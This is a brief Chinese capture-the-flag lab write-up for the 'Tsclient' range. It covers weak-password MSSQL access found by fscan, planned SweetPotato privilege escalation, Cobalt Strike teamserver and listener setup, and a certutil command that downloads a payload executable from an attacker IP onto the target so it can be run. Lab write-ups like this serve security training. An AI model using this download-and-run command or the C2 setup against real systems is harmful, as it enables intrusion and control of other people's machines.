春秋云境-Tsclient

flag01

首先用fscan扫描,得到1443端口开放了mssql服务 且存在弱口令

image-20250520171608022

使用mdut工具连接后,发现权限较低,思路是使用甜土豆提权,也要上传fscan扫描内网,所以先上线CS

这里介绍一下CobaltStrike工具

cobaltstrike工具

工具分服务端和客户端

服务端只能在Linux系统下运行,所以上传到服务器使用就可以

image-20250521161843362

关键文件是teamserver

使用命令:./teamserver [IP] [连接密码]

如下所示:
image-20250521162058336

客户端连接图:
image-20250521162126251

输入 [ip][端口] 用户名随便、密码就是刚才设置的密码

连接好之后设置监听器

image-20250521162312099

image-20250521162350472

监听器的各类参数如下:

参数 释义
name 为监听器名字,可任意
payload payload类型
HTTP Hosts shell反弹的主机,也就是我们 CS 服务器的 IP
HTTP Hosts(Stager) Stager的马请求下载payload的地址
HTTP Port(C2) C2监听的端口

Cobaltstrike 4.1 版本提供了 8 种监听器,

beacon_xx 系列为 Cobalt Strike 自身内置的监听器,即在目标主机执行相应的payload,获取 shell 到 CS 上,包括 dns、http、https、smb 四种方式的监听器;
foreign 系列为外部监听器,通常与 MSF 或者 Armitage 联动,例如获取 meterpreter 到 MSF上。


下面继续讲:
生成payload上传到靶机:使用windows下载命令

certutil -f -split -urlcache http://[ip]/1111.exe C:\Users\Public\1111.exe

image-20250521164230656

下载好了运行即可

运行之后就可以看到主机上线了,然后进入文件浏览上传stoaway、fscan、sweetpotato